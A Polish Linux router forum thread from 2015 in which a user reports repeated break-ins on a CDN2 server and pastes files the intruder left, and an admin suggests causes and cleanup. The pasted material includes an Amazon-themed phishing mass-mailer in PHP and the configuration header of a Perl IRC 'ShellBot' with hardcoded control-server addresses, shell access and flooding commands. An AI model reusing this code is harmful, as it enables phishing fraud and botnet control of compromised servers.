Freesco, NND, CDN, EOS

http://www.freesco.pl
Dzisiaj jest wtorek, 19 marca 2024, 11:33

Strefa czasowa UTC+2godz.




Nowy temat Odpowiedz w temacie  [ Posty: 11 ] 
Autor Wiadomość
Post: środa, 18 lutego 2015, 10:59 
Offline
Użytkownik

Rejestracja: piątek, 2 sierpnia 2002, 11:58
Posty: 758
Czy system cdn2 jest dziurawy ze wzgledu na to ze nie jest juz aktualizowany czy moze to wina konfiguracji ze bardzo szybko mozna sie na niego wlamac?
Dlugie hasla weryfikacja 2 etapowa nic nie daly.

Juz 2 raz ktos Mi sie wlamal na serwer i pozostawial pliki np takie :
<?php
$pwd = getcwd();
$email_from = "Amazon LLC <amazon-orders@receipt.com>";
$mail_header .= "Content-Type: multipart/mixed\n";

$email_subject = "Your Amazon order has been dispatched."; // The Subject of the email
$email_txt = file_get_contents("index.html"); // Message that the email has in it
$fileatt = "$pwd/lllll.zip"; // Path to the file (example)
$fileatt_type = "application/zip"; // File Type
$fileatt_name = "lllll.zip"; // Filename that will be used for the file as the attachment
$file = fopen($fileatt,'rb');
$flsz = filesize($fileatt);
$data = fread($file,$flsz);
fclose($file);
$semi_rand = md5(time());
$mime_boundary = "==Multipart_Boundary_x{$semi_rand}x";
$headers="From: $email_from"; // Who the email is from (example)
$headers .= "\nMIME-Version: 1.0\n" .
"Content-Type: multipart/mixed;\n" .
" boundary=\"{$mime_boundary}\"";
$email_message .= "Take Actionfve\n\n" .
"--{$mime_boundary}\n" .
"Content-Type:text/html; charset=\"iso-8859-1\"\n" .
"Content-Transfer-Encoding: 7bit\n\n" . $email_txt;
$email_message .= "\n\n";
$data = chunk_split(base64_encode($data));
$email_message .= "--{$mime_boundary}\n" .
"Content-Type: {$fileatt_type};\n" .
" name=\"{$fileatt_name}\"\n" .
"Content-Transfer-Encoding: base64\n\n" .
$data . "\n\n" .
"--{$mime_boundary}--\n";

$subject = "Take Actionfve";
//$data = file_get_contents("lllll.zip");
$body = file_get_contents("index.html");
if (!($fp = fopen("list.txt", "r")))
exit("Unable to open $listFile.");
$i=0;
print "Start time is "; print date("Y:m:d H:i"); print "\n";
while (!feof($fp)) {
fscanf($fp, "%s", $name);
$i++;
<------> mail($name,$email_subject,$email_message,$headers);

nastepny
#!/usr/bin/perl^M
# - Adicionado comando !estatisticas ;^M
# - Alterado o comando @pacota para @oldpack;^M
# - Adicionado dois novos pacotadores: @udp e @udpfaixa ;^M
# - Adicionado um novo portscan -> @fullportscan ;^M
# - Adicionado comando @conback com suporte para Windows/Unix :D;^M
# - Adicionado comando: !sair para finalizar o bot;^M
# - Adicionado comando: !novonick para trocar o nick do bot por um novo aleatorio;^M
# - Adicionado comando !entra e !sai ;^M
# - Adicionado comando @download ;^M
# - Adicionado comando !pacotes para ativar/desativar pacotes :);^M
^M
########## CONFIGURACAO ############^M
my $processo = '/usr/local/apache/bin/httpd -DSSL';^M
^M
$servidor='64.32.12.57' unless $servidor;^M
my $porta='80';^M
my @canais=("#gnu");^M
my @adms=("max","laris","x");^M
my @auth=("*!*@max.cc");^M
^M
# Anti Flood ( 6/3 Recomendado )^M
my $linas_max=6;^M
my $sleep=3;^M
^M
my $nick = getnick();^M
my $ircname = getnick();^M
my $realname = getnick();^M
^M
my $acessoshell = 1;^M
######## Stealth ShellBot ##########^M
my $prefixo = "#";^M
my $estatisticas = 0;^M
my $pacotes = 1;^M
####################################^M
^M
my $VERSAO = '0.2a';^M
^M
$SIG{'INT'} = 'IGNORE';^M
$SIG{'HUP'} = 'IGNORE';^M
$SIG{'TERM'} = 'IGNORE';^M
$SIG{'CHLD'} = 'IGNORE';^M
$SIG{'PS'} = 'IGNORE';^M
^M
nastepny
#!/usr/bin/perl
# - Adicionado comando !estatisticas ;
# - Alterado o comando @pacota para @oldpack;
# - Adicionado dois novos pacotadores: @udp e @udpfaixa ;
# - Adicionado um novo portscan -> @fullportscan ;
# - Adicionado comando @conback com suporte para Windows/Unix :D;
# - Adicionado comando: !sair para finalizar o bot;
# - Adicionado comando: !novonick para trocar o nick do bot por um novo aleatorio;
# - Adicionado comando !entra e !sai ;
# - Adicionado comando @download ;
# - Adicionado comando !pacotes para ativar/desativar pacotes :);

########## CONFIGURACAO ############
my $processo = '/usr/local/apache/bin/httpd -DSSL';

$servidor='88.151.99.145' unless $servidor;
my $porta='80';
my @canais=("#ravenul3");
my @adms=("raven","hak");
my @auth=("*!*@hak.ro");

# Anti Flood ( 6/3 Recomendado )
my $linas_max=6;
my $sleep=3;

my $nick = getnick();
my $ircname = getnick();
my $realname = getnick();

my $acessoshell = 1;
######## Stealth ShellBot ##########
my $prefixo = "#";
my $estatisticas = 0;
my $pacotes = 1;
####################################

my $VERSAO = '0.2a';

$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';
$SIG{'CHLD'} = 'IGNORE';
$SIG{'PS'} = 'IGNORE';

_________________
Czy to juz koniec Lanow ...


Na górę
 Wyświetl profil  
 
Post: środa, 18 lutego 2015, 12:05 
Offline
Honorowy Admin

Rejestracja: piątek, 5 lipca 2002, 17:30
Posty: 7800
Lokalizacja: Słupsk
Nie można wykluczyć, ze "coś" na CDN2 jest dziurawe i następują włamania za pomocą prostego exploita. Nie wiem, nie używałem, jedynie Saturas mógłby coś powiedzieć.
Jednak z dużym prawdopodobieństwem można szukać przyczyn gdzie indziej:
- zbyt proste hasła userów systemowych;
- źle napisane strony w php, umożliwiające wykonanie własnego kodu włamywacza;
Ten drugi przypadek jest dość powszechny. Włamywacz nie uzyskuje bezpośrednich uprawnień w systemie, ale udaje mu się zapisać pliki w /tmp i odpalić skrypty, które do czegoś mu służą. ;)

_________________
Obrazek Belfer.one.PL
Obrazek Audio Cafe


Na górę
 Wyświetl profil  
 
Post: środa, 18 lutego 2015, 12:23 
Offline
Użytkownik

Rejestracja: piątek, 2 sierpnia 2002, 11:58
Posty: 758
Dokladnie w tmp Mi sie pojawiaja pliki nowe.Co do plikow php to mam jeden do pokazywania statystyk niceshapera ale moge z niego zrezygnować.
bo serwer potrzebuje tylko do podzialu pasma i przekierowania portow na kamery nawet nie potrzebuje zdalnego dostepu.
Da sie jakos utrudnic wlamanie ograniczajac dostep do serwera ?

_________________
Czy to juz koniec Lanow ...


Na górę
 Wyświetl profil  
 
Post: środa, 18 lutego 2015, 23:44 
Offline
Honorowy Admin

Rejestracja: piątek, 5 lipca 2002, 17:30
Posty: 7800
Lokalizacja: Słupsk
Jeśli już raz maiłeś włamanie, to system jest trefny. Nie masz pewności, czy coś w nim nie zostało zmienione.
Jeśli nastąpiło przejęcie roota, to tylko wyczyścić dysk i zainstalować system od zera.
Zobacz co masz otwarte z zewnątrz (iptables -L) i jeśli możesz zamknąć, to zamknij. Choć nie ma gwarancji, że włamywacz nie ma backdoora.

_________________
Obrazek Belfer.one.PL
Obrazek Audio Cafe


Na górę
 Wyświetl profil  
 
Post: czwartek, 19 lutego 2015, 12:53 
Offline
Użytkownik

Rejestracja: piątek, 2 sierpnia 2002, 11:58
Posty: 758
Wiem . Wlasnie zapasowy serwer probuje odpalic na cdn2 ale pakiety chyba nie dzialaja bo pacman nic nie moze pobrac nawet mc a bez mc to nic nie zrobie.

_________________
Czy to juz koniec Lanow ...


Na górę
 Wyświetl profil  
 
Post: środa, 5 sierpnia 2015, 20:20 
Offline
Użytkownik

Rejestracja: środa, 23 stycznia 2008, 17:32
Posty: 691
Lokalizacja: Pabianice
No wlasnie ...
Zaczely sie upaly i chcialem doinstalowac sobie lm_sensors ...
Ale sa ciagle problemy z repozytorium extra.
Cos sie zmieni w tej kwestii ?

Posluchajcie jesli Macie problem z serwerem to moge zaoferowac pomoc.


Na górę
 Wyświetl profil  
 
Post: niedziela, 9 sierpnia 2015, 12:37 
Offline
Honorowy Admin

Rejestracja: piątek, 5 lipca 2002, 17:30
Posty: 7800
Lokalizacja: Słupsk
O ile pamiętam to po awarii serwera u Albercika (dawno temu), nie udało się odzyskać części danych. Jedyny serwer z pakietami jest pod adresem cdn.freesco.pl - innego nie ma i nie będzie.

Czas pomyśleć o czymś innym.

_________________
Obrazek Belfer.one.PL
Obrazek Audio Cafe


Na górę
 Wyświetl profil  
 
Post: wtorek, 11 sierpnia 2015, 12:20 
Offline
Użytkownik

Rejestracja: środa, 23 stycznia 2008, 17:32
Posty: 691
Lokalizacja: Pabianice
A w źyciu Maćku ... :mrgreen:
Chyba , że mnie do tego zmusicie :P


Na górę
 Wyświetl profil  
 
Post: wtorek, 11 sierpnia 2015, 12:24 
Offline
Użytkownik

Rejestracja: środa, 23 stycznia 2008, 17:32
Posty: 691
Lokalizacja: Pabianice
Monter i to nie koniec lanow :)
Sam pracuje w firmie i to rozwijajacej sie w ktorej
sprzedaje sie internet przez lan pppoe.
Nawet Ci powiem ze tv tez idzie raczej wlasnie w te strone.
Sprzet tez bardzo tanieje.


Na górę
 Wyświetl profil  
 
Post: poniedziałek, 17 sierpnia 2015, 11:00 
Offline
Użytkownik

Rejestracja: niedziela, 16 maja 2004, 21:32
Posty: 1203
Lokalizacja: Bieruń
Maciek pisze:
O ile pamiętam to po awarii serwera u Albercika (dawno temu), nie udało się odzyskać części danych. Jedyny serwer z pakietami jest pod adresem cdn.freesco.pl - innego nie ma i nie będzie.

Czas pomyśleć o czymś innym.

A nie jest to czasem repo CDN a nie CDN2?


Na górę
 Wyświetl profil  
 
Post: czwartek, 20 sierpnia 2015, 17:24 
Offline
Honorowy Admin

Rejestracja: piątek, 5 lipca 2002, 17:30
Posty: 7800
Lokalizacja: Słupsk
Nie wiem. Wiem, że jest jedyny.

_________________
Obrazek Belfer.one.PL
Obrazek Audio Cafe


Na górę
 Wyświetl profil  
 
Wyświetl posty nie starsze niż:  Sortuj wg  
Nowy temat Odpowiedz w temacie  [ Posty: 11 ] 

Strefa czasowa UTC+2godz.


Kto jest online

Użytkownicy przeglądający to forum: Obecnie na forum nie ma żadnego zarejestrowanego użytkownika i 6 gości


Nie możesz tworzyć nowych tematów
Nie możesz odpowiadać w tematach
Nie możesz zmieniać swoich postów
Nie możesz usuwać swoich postów
Nie możesz dodawać załączników

Szukaj:
Przejdź do:  
cron
Technologię dostarcza phpBB® Forum Software © phpBB Group
Hosting: Compus-Net
RobertKonik.pl